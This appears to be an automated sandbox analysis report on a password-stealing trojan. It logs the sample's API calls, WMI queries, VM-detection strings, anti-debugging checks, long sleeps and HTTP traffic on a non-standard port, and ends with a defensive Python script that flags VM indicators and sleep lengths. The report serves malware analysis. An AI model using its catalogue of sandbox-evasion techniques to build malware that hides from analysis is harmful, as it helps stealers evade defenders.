                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.278226031.00000000077A0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenlsbres.dllj% vs SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.278274277.00000000077C0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewmiutils.dll.muij% vs SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.278368604.0000000007800000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.270853707.00000000027B2000.00000004.00000001.sdmpBinary or memory string: OriginalFilename vs SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.277892249.0000000006E50000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameaspnet_rc.dllT vs SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeBinary or memory string: OriginalFilenameCloisters.exe4 vs SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, RELOCS_STRIPPED
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeStatic PE information: Section: .rsrc ZLIB complexity 0.988744491186
                      Source: classification engineClassification label: mal88.troj.spyw.evad.winEXE@1/21@3/2
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,1_2_004019F0
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe.log
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe File created: C:\Users\user\AppData\Local\Temp\tmp76A9.tmp
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe Command line argument: 08A 1_2_00413780
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe File read: C:\Windows\System32\drivers\etc\hosts
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe Virustotal: Detection: 74%
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe Metadefender: Detection: 27%
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe ReversingLabs: Detection: 75%
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: _.pdb source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000003.206836108.000000000075C000.00000004.00000001.sdmp
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe Code function: 1_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe Static PE information: real checksum: 0x23bfb should be: 0x45256
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe Code function: 1_2_0040E21D push ecx; ret 1_2_0040E230
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe Code function: 1_2_024FD0C1 pushad ; iretd 1_2_024FD101
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe Code function: 1_2_0510EC7A push 8B0876FFh; retf 1_2_0510EC7F

                      Hooking and other Techniques for Hiding and Protection:

                      Uses known network protocols on non-standard ports
                      Source: unknown Network traffic detected: HTTP traffic on port 49718 -> 3214
                      Source: unknown Network traffic detected: HTTP traffic on port 3214 -> 49718
                      Source: unknown Network traffic detected: HTTP traffic on port 49726 -> 3214
                      Source: unknown Network traffic detected: HTTP traffic on port 3214 -> 49726
                      Source: unknown Network traffic detected: HTTP traffic on port 49728 -> 3214
                      Source: unknown Network traffic detected: HTTP traffic on port 3214 -> 49728
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe Process information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                      Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe Code function: 1_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe Window / User API: threadDelayed 2750
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe Window / User API: threadDelayed 5689
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe Registry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe TID: 6964 Thread sleep time: -11990383647911201s >= -30000s
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.275112004.00000000058E5000.00000004.00000001.sdmp Binary or memory string: VMware
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.275112004.00000000058E5000.00000004.00000001.sdmp Binary or memory string: Win32_VideoController(Standard display types)VMware_KWC4Y56Win32_VideoControllerAXZNRU94VideoController120060621000000.000000-00026994397display.infMSBDAUCR_NBGZPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsP7N5LX5Al
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.275691984.0000000005D50000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.274704985.0000000005020000.00000004.00000001.sdmp Binary or memory string: VMWare
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.275691984.0000000005D50000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.275691984.0000000005D50000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.269777182.00000000007D3000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe, 00000001.00000002.275691984.0000000005D50000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe Process information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0040CE09
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exeCode function: 1_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,1_2_004019F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe | Code function: 1_2_0040ADB0 GetProcessHeap,HeapFree 1_2_0040ADB0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe | Code function: 1_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess 1_2_0040CE09
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe | Code function: 1_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess 1_2_0040E61C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe | Code function: 1_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter 1_2_00416F6A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe | Code function: 1_2_004123F1 SetUnhandledExceptionFilter 1_2_004123F1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe | Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe | Code function: GetLocaleInfoA 1_2_00417A20
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.Siggen2.61624.27953.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
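The WMI queries against Win32_VideoController and Win32_Processor, the "VMware" strings and the PCI identifier recovered from the process memory, and the thread delay of 922337203685477 ms above are the sample's environment checks. The example below is added here and is not code from the sample, from RedLine, or from the sandbox vendor: it shows the analyst-side view of those checks in Python, scanning WMI-style property records for the markers such a stealer keys on and classifying sleep lengths. The records are constructed for the example (the PNPDeviceID is the one recovered from memory above, where VEN_15AD is VMware's PCI vendor ID); the marker and vendor-ID tables and the 180-second threshold are the example's own assumptions, not values taken from the sample.

```python
import re

# Assumed marker set: substrings commodity stealers commonly test WMI output for.
# This list is an assumption of the example, not extracted from the sample.
VM_STRING_MARKERS = ("vmware", "virtualbox", "vbox", "hyper-v", "virtual", "qemu", "kvm", "xen")

# PCI vendor IDs as they appear in a Plug-and-Play device ID. 15AD is VMware
# (the vendor seen in the memory string above); the others are added for generality.
VM_PCI_VENDORS = {
    "15AD": "VMware",
    "80EE": "VirtualBox (InnoTek)",
    "1414": "Microsoft (Hyper-V synthetic device)",
    "1AF4": "Red Hat virtio (QEMU/KVM)",
}

PCI_ID_RE = re.compile(r"PCI\\VEN_([0-9A-Fa-f]{4})&DEV_([0-9A-Fa-f]{4})")


def vm_indicators(record):
    """Scan one WMI record (property name -> value) and return the VM indicators found.

    A stealer doing the same thing would typically concatenate every value of the
    Win32_VideoController / Win32_Processor / Win32_DiskDrive rows and substring-match,
    which is what the concatenated blob recovered from memory above looks like.
    """
    hits = []
    for prop, value in record.items():
        if value is None:
            continue
        text = str(value)
        low = text.lower()
        for marker in VM_STRING_MARKERS:
            if marker in low:
                hits.append(f"{prop} contains '{marker}'")
        for ven, dev in PCI_ID_RE.findall(text):
            vendor = VM_PCI_VENDORS.get(ven.upper())
            if vendor:
                hits.append(f"{prop} PCI vendor {ven.upper()} ({vendor}), device {dev.upper()}")
    return hits


# .NET TimeSpan.MaxValue is 2**63-1 ticks of 100 ns; expressed in whole milliseconds
# that is 922337203685477, exactly the delay logged for the sample above.
DOTNET_TIMESPAN_MAX_MS = (2 ** 63 - 1) // 10_000

# Assumed threshold: the report's own "long sleeps (>= 3 min)" signature.
LONG_SLEEP_MS = 180_000


def classify_delay(delay_ms):
    """Classify a thread delay the way a sandbox signature would."""
    if delay_ms < 0 or delay_ms >= DOTNET_TIMESPAN_MAX_MS:
        return "effectively infinite (TimeSpan.MaxValue / Timeout.Infinite)"
    if delay_ms >= LONG_SLEEP_MS:
        return "long sleep (>= 3 min), consistent with sandbox timeout evasion"
    return "short"


# Constructed sample records. The PNPDeviceID value is the one present in the
# memory string above; the other properties are invented for the example.
SAMPLE_VIDEO_CONTROLLER = {
    "Name": "VMware SVGA 3D",
    "AdapterCompatibility": "VMware",
    "PNPDeviceID": r"PCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78",
}
SAMPLE_PROCESSOR = {"Name": "Intel(R) Core(TM) i7-9700", "Manufacturer": "GenuineIntel"}


if __name__ == "__main__":
    for name, rec in (("Win32_VideoController", SAMPLE_VIDEO_CONTROLLER),
                      ("Win32_Processor", SAMPLE_PROCESSOR)):
        print(name, "->", vm_indicators(rec) or "no VM indicators")
    for ms in (922337203685477, 2750, 5689, 200_000):
        print(ms, "ms ->", classify_delay(ms))
```

The "virtual" substring also matches Windows' own Hyper-V Host Compute Service error messages, such as "A Virtual Machine could not be started because Hyper-V is not installed." listed above, which live in mapped system images rather than in the sample's code; a string hit in such a region is weak evidence next to a PCI vendor ID returned by a live WMI query. For a sandbox that must survive these checks, the PNPDeviceID and adapter name returned by Win32_VideoController are the values to mask first.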